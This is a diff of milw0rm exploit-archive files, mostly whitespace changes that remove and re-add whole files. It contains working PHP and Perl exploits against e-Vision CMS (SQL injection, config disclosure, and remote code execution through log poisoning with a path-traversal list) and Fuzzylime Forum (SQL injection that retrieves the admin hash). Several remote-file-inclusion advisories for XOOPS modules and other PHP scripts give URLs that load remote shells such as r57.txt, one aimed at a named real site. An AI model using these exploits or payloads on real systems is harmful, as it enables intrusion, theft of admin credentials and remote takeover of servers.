-"../../../../../var/log/apache/error_log", -"../../../../../var/log/apache/error.log", -"../../../../../var/log/access_log", -"../../../../../var/log/error_log" -); - -for ($i=0; $i<=count($paths)-1; $i++) -{ -$a=$i+2; - -$packet ="GET " . $p . "admin/functions.php?cmd=" . $cmd . 
" HTTP/1.1\r\n"; -$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; -$packet.="Host: " . $host . "\r\n"; -$packet.="Cookie: adminlang=" . $paths[$i] . "%00\r\n"; -$packet.="Connection: Close\r\n\r\n"; - -sendpacketii($packet); - -if (strstr($html,"w4ckw4ck")) - { - $temp=explode("w4ckw4ck",$html); - head(); - echo $temp[1]; - footer(); - exit; - } -} - - head(); - echo "[-] Exploit Failed...\r\n"; - footer(); - -} - -?> - -# milw0rm.com [2007-06-08] +#!/usr/bin/php -q -d short_open_tag=on + +# +################# + +...need i say more? + + + +Bug #2 (admin/functions.php): + +################# +# +# if ( isset($_COOKIE['adminlang']) ) { $language_selector = $_COOKIE['adminlang']; } +# else { $language_selector = "en"; } +# include("lang/".$language_selector.".php"); +# +################# + +...speaks for it self really. + + + +Bug #3 (); + +################# +# +# $sql = "SELECT `style_css` FROM `templates` WHERE `id`='".$_GET['template']."' AND `show`='Y' AND `trash`='N'"; +# $result = mysql_query($sql) or die(mysql_error()); +# $row = mysql_fetch_array($result); +# $css .= $row['style_css']; +# +################# + +...again appauling! 
+ +*/ + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +if ($argc<4) { +print "-------------------------------------------------------------------------\r\n"; +print " e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n"; +print "-------------------------------------------------------------------------\r\n"; +print "Usage: w4ck1ng_evision.php [OPTION] [HOST] [PATH] ([USER] [PASS] [COMMAND])\r\n\r\n"; +print "[OPTION] = 0 = SQL Injection (Admin user & hash retrieval)\r\n"; +print " 1 = Config File Disclosure (Database user & pass retrieval)\r\n"; +print " 2 = Remote Code Execution\r\n"; +print "[HOST] = Target server's hostname or ip address\r\n"; +print "[PATH] = Path where e-Vision CMS is located\r\n"; +print "[COMMAND] = Command to execute\r\n\r\n"; +print "e.g. w4ck1ng_evision.php 0 victim.com /\r\n"; +print " w4ck1ng_evision.php 1 victim.com /\r\n"; +print " w4ck1ng_evision.php 2 victim.com / username password \"ls -lia\"\r\n"; +print "-------------------------------------------------------------------------\r\n"; +print " http://www.w4ck1ng.com\r\n"; +print " ...Silentz\r\n"; +print "-------------------------------------------------------------------------\r\n"; +die; +} + +//Props to rgod for the following functions + +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); +} + +function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + return (float) $sec + ((float) $usec * 100000); +} + +$exploit = $argv[1]; +$host = $argv[2]; +$path = $argv[3]; +$cmd = $argv[4]; +$cmd = urlencode($cmd); +$port=80;$proxy=""; + +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +function head(){ + + print "-------------------------------------------------------------------------\r\n"; + print " e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit\r\n"; + print "-------------------------------------------------------------------------\r\n"; + + } + +function footer(){ + + print "-------------------------------------------------------------------------\r\n"; + print " http://www.w4ck1ng.com\r\n"; + print " ...Silentz\r\n"; + print "-------------------------------------------------------------------------\r\n"; + } + +if ($exploit==0){ + + head(); + + $sql = "-999' UNION SELECT CONCAT(CHAR(85),CHAR(115),CHAR(101),CHAR(114),CHAR(110),CHAR(97),CHAR(109),CHAR(101),CHAR(61),username,CHAR(58),CHAR(58),CHAR(72),CHAR(97),CHAR(115),CHAR(104),CHAR(61),pass) FROM users WHERE idusers=1 /*"; + $sql = urlencode($sql); + $packet ="GET " . $path . "style.php?template=" . $sql . 
" HTTP/1.1\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + if (strstr($html,"Username=")) + { + $temp=explode("::Hash=",$html); + $temp2=explode("Username=",$temp[0]); + + echo "[+] Admin User: " . $temp2[1] . "\n"; + + $temp=explode("Username=",$html); + $temp2=explode("::Hash=",$temp[1]); + + echo "[+] Admin Hash: " . $temp2[1] . "\r\n"; + + footer(); + die; + } + +else{die(); exit();}} + +if($exploit==1){ + + $sploit = "admin/show_img.php?img=../vars.php"; + $packet ="GET " . $path . $sploit . " HTTP/1.1\r\n"; + $packet.="Host: " . $host . "\r\n"; + $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; + $packet.="Connection: Close\r\n\r\n"; + sendpacketii($packet); + + if (strstr($html,""; +$packet="GET " . $p . $code . " HTTP/1.0\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; +$packet.="Host: " . $host . 
"\r\n"; +$packet.="Connection: close\r\n\r\n"; + +sendpacketii($packet); + +$paths= array ( +"../../../../../var/log/httpd/access_log", +"../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../etc/httpd/logs/access_log", +"../../../../../etc/httpd/logs/access.log", +"../../../../../etc/httpd/logs/error_log", +"../../../../../etc/httpd/logs/error.log", +"../../../../../var/www/logs/access_log", +"../../../../../var/www/logs/access.log", +"../../../../../usr/local/apache/logs/access_log", +"../../../../../usr/local/apache/logs/access.log", +"../../../../../var/log/apache/access_log", +"../../../../../var/log/apache/access.log", +"../../../../../var/log/access_log", +"../../../../../var/www/logs/error_log", +"../../../../../var/www/logs/error.log", +"../../../../../usr/local/apache/logs/error_log", +"../../../../../usr/local/apache/logs/error.log", +"../../../../../var/log/apache/error_log", +"../../../../../var/log/apache/error.log", +"../../../../../var/log/access_log", +"../../../../../var/log/error_log" +); + +for ($i=0; $i<=count($paths)-1; $i++) +{ +$a=$i+2; + +$packet ="GET " . $p . "admin/functions.php?cmd=" . $cmd . " HTTP/1.1\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n"; +$packet.="Host: " . $host . "\r\n"; +$packet.="Cookie: adminlang=" . $paths[$i] . 
"%00\r\n"; +$packet.="Connection: Close\r\n\r\n"; + +sendpacketii($packet); + +if (strstr($html,"w4ckw4ck")) + { + $temp=explode("w4ckw4ck",$html); + head(); + echo $temp[1]; + footer(); + exit; + } +} + + head(); + echo "[-] Exploit Failed...\r\n"; + footer(); + +} + +?> + +# milw0rm.com [2007-06-08] diff --git a/platforms/php/webapps/4055.htm b/platforms/php/webapps/4055.htm index b01510320..d5ca6980e 100755 --- a/platforms/php/webapps/4055.htm +++ b/platforms/php/webapps/4055.htm @@ -1,61 +1,61 @@ - - - -PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion -Exploit - - - - - - -
    - -

    PHP Real Estate (header.php) Remote File Inclusion Exploit

    - -

    -

    - Target: - [http://[vittima]/[path] -   -

    -

    -
    -


    - -

    - -# notsec.com [08-06-2007]

    -

    -
    - - - - -# milw0rm.com [2007-06-09] + + + +PHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion +Exploit + + + + + + +
    + +

    PHP Real Estate (header.php) Remote File Inclusion Exploit

    + +

    +

    + Target: + [http://[vittima]/[path] +   +

    +

    +
    +


    + +

    + +# notsec.com [08-06-2007]

    +

    +
    + + + + +# milw0rm.com [2007-06-09] diff --git a/platforms/php/webapps/406.pl b/platforms/php/webapps/406.pl index d1532ddba..79f4f2889 100755 --- a/platforms/php/webapps/406.pl +++ b/platforms/php/webapps/406.pl @@ -56,6 +56,6 @@ print $_; print "\n"; close $remote; - - -# milw0rm.com [2004-08-20] + + +# milw0rm.com [2004-08-20] diff --git a/platforms/php/webapps/4062.pl b/platforms/php/webapps/4062.pl index 6e13a5464..25fa5f208 100755 --- a/platforms/php/webapps/4062.pl +++ b/platforms/php/webapps/4062.pl 
@@ -1,52 +1,52 @@ -#!/usr/bin/perl -w - -################################################################################# -# # -# Fuzzylime Forum 1.0 SQL Injection Exploit # -# # -# Discovered by: Silentz # -# Payload: Admin Username & Hash Retrieval # -# Website: http://www.w4ck1ng.com # -# # -# Vulnerable Code (low.php): # -# # -# $gettopicid = mysql_query("SELECT * FROM ${table_prefix}threads # -# WHERE threadid='$_GET[topic]'"); # -# # -# PoC: http://victim.com/low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58), # -# username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE # -# userid=1/* # -# # -# Subject To: magic_quotes_gpc set to off # -# GoogleDork: Get your own! # -# # -# Shoutz: The entire w4ck1ng community # -# # -# NOTE: You can also grab the username & hash via a cookie logger and this XSS: # -# # -# http://victim.com/low.php?topic="> # -# # -################################################################################# - -use LWP::UserAgent; -die "Example: exploit.pl http://victim.com/\n" unless @ARGV; - -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - -$host = $ARGV[0] . 
"low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*"; - -$res = $b->request(HTTP::Request->new(GET=>$host)); -$answer = $res->content; - -if ($answer =~ /raquo; :(.*?):/){ - print "\nBrought to you by w4ck1ng.com...\n"; - print "\n[+] Admin User : $1"; -} - -if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n";} - -else{print "\n[-] Exploit Failed...\n";} - -# milw0rm.com [2007-06-12] +#!/usr/bin/perl -w + +################################################################################# +# # +# Fuzzylime Forum 1.0 SQL Injection Exploit # +# # +# Discovered by: Silentz # +# Payload: Admin Username & Hash Retrieval # +# Website: http://www.w4ck1ng.com # +# # +# Vulnerable Code (low.php): # +# # +# $gettopicid = mysql_query("SELECT * FROM ${table_prefix}threads # +# WHERE threadid='$_GET[topic]'"); # +# # +# PoC: http://victim.com/low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58), # +# username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE # +# userid=1/* # +# # +# Subject To: magic_quotes_gpc set to off # +# GoogleDork: Get your own! # +# # +# Shoutz: The entire w4ck1ng community # +# # +# NOTE: You can also grab the username & hash via a cookie logger and this XSS: # +# # +# http://victim.com/low.php?topic="> # +# # +################################################################################# + +use LWP::UserAgent; +die "Example: exploit.pl http://victim.com/\n" unless @ARGV; + +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + +$host = $ARGV[0] . 
"low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*"; + +$res = $b->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; + +if ($answer =~ /raquo; :(.*?):/){ + print "\nBrought to you by w4ck1ng.com...\n"; + print "\n[+] Admin User : $1"; +} + +if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n";} + +else{print "\n[-] Exploit Failed...\n";} + +# milw0rm.com [2007-06-12] diff --git a/platforms/php/webapps/4063.txt b/platforms/php/webapps/4063.txt index c0ffe5780..ec2deb116 100755 --- a/platforms/php/webapps/4063.txt +++ b/platforms/php/webapps/4063.txt 
@@ -1,19 +1,19 @@
-~~~~~~~~~~~~~~~~~~~~~~~
-XOOPS Module TinyContent Remote File Inclusion
-version: < 1.5
-source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
-~~~~~~~~~~~~~~~~~~~~~~
-Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
-~~~~~~~~~~~~~~~~~~~~~~
-BUG:
-http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?
-
-Vuln site:
-http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
-Contact: splo1t[at]yahoo[dot]com
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-# milw0rm.com [2007-06-12]
+~~~~~~~~~~~~~~~~~~~~~~~
+XOOPS Module TinyContent Remote File Inclusion
+version: < 1.5
+source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
+~~~~~~~~~~~~~~~~~~~~~~
+Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
+~~~~~~~~~~~~~~~~~~~~~~
+BUG:
+http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?
+
+Vuln site:
+http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
+Contact: splo1t[at]yahoo[dot]com
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/php/webapps/4064.txt b/platforms/php/webapps/4064.txt
index e750f77d9..6ab37c9fc 100755
--- a/platforms/php/webapps/4064.txt
+++ b/platforms/php/webapps/4064.txt
@@ -1,13 +1,13 @@
-BeyazKurt - B3yazKurt@Hotmail.Com
-
-XOOPS Modules Horoscope
-
-http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
-
-modules/horoscope/footer.php?xoopsConfig[root_path]=
-
-{NetLife Since : '2003-4'}
-
-Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(
-
-# milw0rm.com [2007-06-12]
+BeyazKurt - B3yazKurt@Hotmail.Com
+
+XOOPS Modules Horoscope
+
+http://www.xoops.org/modules/repository/visit.php?cid=32&lid=1162
+
+modules/horoscope/footer.php?xoopsConfig[root_path]=
+
+{NetLife Since : '2003-4'}
+
+Emekli Heykır BeyazKurt - Neti bıraktım! Dönüşüm mükemmel olcak ;(
+
+# milw0rm.com [2007-06-12]
diff --git a/platforms/php/webapps/4068.txt b/platforms/php/webapps/4068.txt
index f64842d86..7f72abcf2 100755
--- a/platforms/php/webapps/4068.txt
+++ b/platforms/php/webapps/4068.txt
@@ -1,20 +1,20 @@
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-XOOPS Module XFsection Remote File Inclusion
-version: < 1.07
-source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
-
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
-Contact: splo1t[at]yahoo[dot]com
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Note:
-In some cases you will need to be authenticated.
-
-# milw0rm.com [2007-06-13]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+XOOPS Module XFsection Remote File Inclusion
+version: < 1.07
+source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Discovered by Sp[L]o1T from hTTp://hacking.3Xforum.Ro
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Shoutz t0 : Vladiii,Johnny,Str0ke,Shocker,Epic,OSHO,Zapakitul and all members from Hacking[dot]3Xforum[dot]RO
+Contact: splo1t[at]yahoo[dot]com
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Note:
+In some cases you will need to be authenticated.
+
+# milw0rm.com [2007-06-13]
diff --git a/platforms/php/webapps/4069.txt b/platforms/php/webapps/4069.txt
index 40d3086b1..8a992903d 100755
--- a/platforms/php/webapps/4069.txt
+++ b/platforms/php/webapps/4069.txt
@@ -1,37 +1,37 @@ -############################################################################################## -# ___ ___ _ -# / _ \ / _ \ | | -# __ _| | | | | | |_ __ ___ _ __ ___| |_ -# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| -# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ -# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| -# __/ | -# |___/ -############################################################################################## -#INFO: -#Program Title ############################################################################### -#XT-Conteudo (XOOPS Module) Remote File Inclusion Vulnerability -# -#Description ################################################################################# -#Content module for XOOPS CMS -# -#Vuln Code ################################################################################### -#In /admin/spaw/spaw_control.class.php -# include $spaw_root.'config/spaw_control.config.php'; -# include $spaw_root.'class/toolbars.class.php'; -# include $spaw_root.'class/lang.class.php'; -# -#Script Download ############################################################################## -#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405 -# -#Exploit ###################################################################################### -# -#http://[ site ]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]? 
-# -#Credits ###################################################################################### -#FiSh for vulnerability -#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke -# grumpy, and everyone else at g00ns.net -############################################################################################### - -# milw0rm.com [2007-06-13] +############################################################################################## +# ___ ___ _ +# / _ \ / _ \ | | +# __ _| | | | | | |_ __ ___ _ __ ___| |_ +# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| +# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ +# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| +# __/ | +# |___/ +############################################################################################## +#INFO: +#Program Title ############################################################################### +#XT-Conteudo (XOOPS Module) Remote File Inclusion Vulnerability +# +#Description ################################################################################# +#Content module for XOOPS CMS +# +#Vuln Code ################################################################################### +#In /admin/spaw/spaw_control.class.php +# include $spaw_root.'config/spaw_control.config.php'; +# include $spaw_root.'class/toolbars.class.php'; +# include $spaw_root.'class/lang.class.php'; +# +#Script Download ############################################################################## +#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1405 +# +#Exploit ###################################################################################### +# +#http://[ site ]/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[ shell ]? 
+# +#Credits ###################################################################################### +#FiSh for vulnerability +#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke +# grumpy, and everyone else at g00ns.net +############################################################################################### + +# milw0rm.com [2007-06-13] diff --git a/platforms/php/webapps/4070.txt b/platforms/php/webapps/4070.txt index 1628f8fd4..618716e6e 100755 --- a/platforms/php/webapps/4070.txt +++ b/platforms/php/webapps/4070.txt 
@@ -1,38 +1,38 @@ -############################################################################################## -# ___ ___ _ -# / _ \ / _ \ | | -# __ _| | | | | | |_ __ ___ _ __ ___| |_ -# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| -# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ -# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| -# __/ | -# |___/ -############################################################################################## -#INFO: -#Program Title ############################################################################### -#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability -# -#Description ################################################################################# -#Editor module for XOOPS CMS -# -#Vuln Code ################################################################################### -#In /admin/editor2/spaw_control.class.php: -# include $spaw_root.'config/spaw_control.config.php'; -# include $spaw_root.'class/toolbars.class.php'; -# include $spaw_root.'class/lang.class.php'; -#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work. -# -#Script Download ############################################################################## -#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123 -# -#Exploit ###################################################################################### -# -#http://[ site ]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[ shell ]? 
-# -#Credits ###################################################################################### -#FiSh for vulnerability -#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke -# grumpy, and everyone else at g00ns.net -############################################################################################### - -# milw0rm.com [2007-06-13] +############################################################################################## +# ___ ___ _ +# / _ \ / _ \ | | +# __ _| | | | | | |_ __ ___ _ __ ___| |_ +# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __| +# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ +# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| +# __/ | +# |___/ +############################################################################################## +#INFO: +#Program Title ############################################################################### +#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability +# +#Description ################################################################################# +#Editor module for XOOPS CMS +# +#Vuln Code ################################################################################### +#In /admin/editor2/spaw_control.class.php: +# include $spaw_root.'config/spaw_control.config.php'; +# include $spaw_root.'class/toolbars.class.php'; +# include $spaw_root.'class/lang.class.php'; +#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work. +# +#Script Download ############################################################################## +#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123 +# +#Exploit ###################################################################################### +# +#http://[ site ]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[ shell ]? 
+# +#Credits ###################################################################################### +#FiSh for vulnerability +#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke +# grumpy, and everyone else at g00ns.net +############################################################################################### + +# milw0rm.com [2007-06-13] diff --git a/platforms/php/webapps/4071.txt b/platforms/php/webapps/4071.txt index 00d718e92..37e980e2c 100755 --- a/platforms/php/webapps/4071.txt +++ b/platforms/php/webapps/4071.txt 
@@ -1,36 +1,36 @@ -*sitellite* -v 4.2.12 -DORK : "powered by Sitellite" -FOUND BY : o0xxdark0o - o0xxdark0o[at]msn.com -Website: http://www.sitellite.org/ -DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite -REMOTE FILE ICLUDE -############################################################ -FILE : -PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php -############################################################ -EXP: -xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell -? -############################################################ -CODE: on line 4 - -############################################################ -thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro -www.hach-teach.org - www.3asfh.com -############################################################ -BY : o0xxdark0o - o0xxdark0o@msn.com - -PhpDocumentor directory is .htaccess'ed - -# milw0rm.com [2007-06-14] +*sitellite* +v 4.2.12 +DORK : "powered by Sitellite" +FOUND BY : o0xxdark0o + o0xxdark0o[at]msn.com +Website: http://www.sitellite.org/ +DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite +REMOTE FILE ICLUDE +############################################################ +FILE : +PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php +############################################################ +EXP: +xxx.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=Shell +? +############################################################ +CODE: on line 4 + +############################################################ +thanks for all my friends.. str0ke ... mr_6.1.9 .... oxdo .... cold z3ro +www.hach-teach.org - www.3asfh.com +############################################################ +BY : o0xxdark0o + o0xxdark0o@msn.com + +PhpDocumentor directory is .htaccess'ed + +# milw0rm.com [2007-06-14] 
diff --git a/platforms/php/webapps/4072.txt b/platforms/php/webapps/4072.txt index b9fbe0182..ea0a1a0f9 100755 --- a/platforms/php/webapps/4072.txt +++ b/platforms/php/webapps/4072.txt @@ -1,57 +1,57 @@ -phphtml -v 0.6.4 -FOUND BY : o0xxdark0o -Website: http://www.sitellite.org/ -DOWNLOAD : http://sourceforge.net/projects/phphtml -REMOTE FILE INCLUDE -############################################################ -FILE : -PATH\phphtml.php -############################################################ -EXP: -xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt? -############################################################ -CODE: on line 19 -render(); -*/ - - -############################################################ -thanks for all my friends.. str0ke .... oxdo .... cold z3ro -www.hach-teach.org - www.3asfh.com -############################################################ -BY : o0xxdark0o - o0xxdark0o@msn.com - -# milw0rm.com [2007-06-14] +phphtml +v 0.6.4 +FOUND BY : o0xxdark0o +Website: http://www.sitellite.org/ +DOWNLOAD : http://sourceforge.net/projects/phphtml +REMOTE FILE INCLUDE +############################################################ +FILE : +PATH\phphtml.php +############################################################ +EXP: +xxx.com\path\phphtml.php?htmlclass_path=SH3ll.txt? +############################################################ +CODE: on line 19 +render(); +*/ + + +############################################################ +thanks for all my friends.. str0ke .... oxdo .... cold z3ro +www.hach-teach.org - www.3asfh.com +############################################################ +BY : o0xxdark0o + o0xxdark0o@msn.com + +# milw0rm.com [2007-06-14] diff --git a/platforms/php/webapps/4074.txt b/platforms/php/webapps/4074.txt index 9f84d99f4..d6b3dd61d 100755 --- a/platforms/php/webapps/4074.txt +++ b/platforms/php/webapps/4074.txt 
@@ -1,52 +1,52 @@ -######################################################################################## -phpMyInventory (pmi) -v. 2.8 -FOUND BY : o0xxdark0o - o0xxdark0o[at]msn.com -DOWNLOAD : http://sourceforge.net/projects/phpmyinventory/ -REMOTE FILE ICLUDE -######################################################################################## -FILE : -PATH\Includes\global.inc.php -######################################################################################## -EXPLOIT: -www.xxx.com/pmi_v28/Includes/global.inc.php?strIncludePrefix=Shell.txt? -######################################################################################## -thanks for all my friends.. str0ke ... oxdo .... cold z3ro...keenest -www.hach-teach.org - www.3asfh.com - www.goldenawy.com - www.yee7.com -######################################################################################## -CODE: - " - -Down : http://www.yfma.com/count/click.php?id=1 -Site : http://yfma.com/yfs/ - -Exploit : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ? - -Note : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda] - -/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// - -# milw0rm.com [2007-06-17] +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +Title : YourFreeScreamer 1.0 Remote File İnclude + +Author : Crackers_Child + +Contact : cybermilitan@hotmail.com + +Bug : in bodyTemplate.php " " + +Down : http://www.yfma.com/count/click.php?id=1 +Site : http://yfma.com/yfs/ + +Exploit : http://site.com/script_path/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ? 
+ +Note : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda] + +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +# milw0rm.com [2007-06-17] diff --git a/platforms/php/webapps/4076.php b/platforms/php/webapps/4076.php index 80db2179b..e240dd962 100755 --- a/platforms/php/webapps/4076.php +++ b/platforms/php/webapps/4076.php 
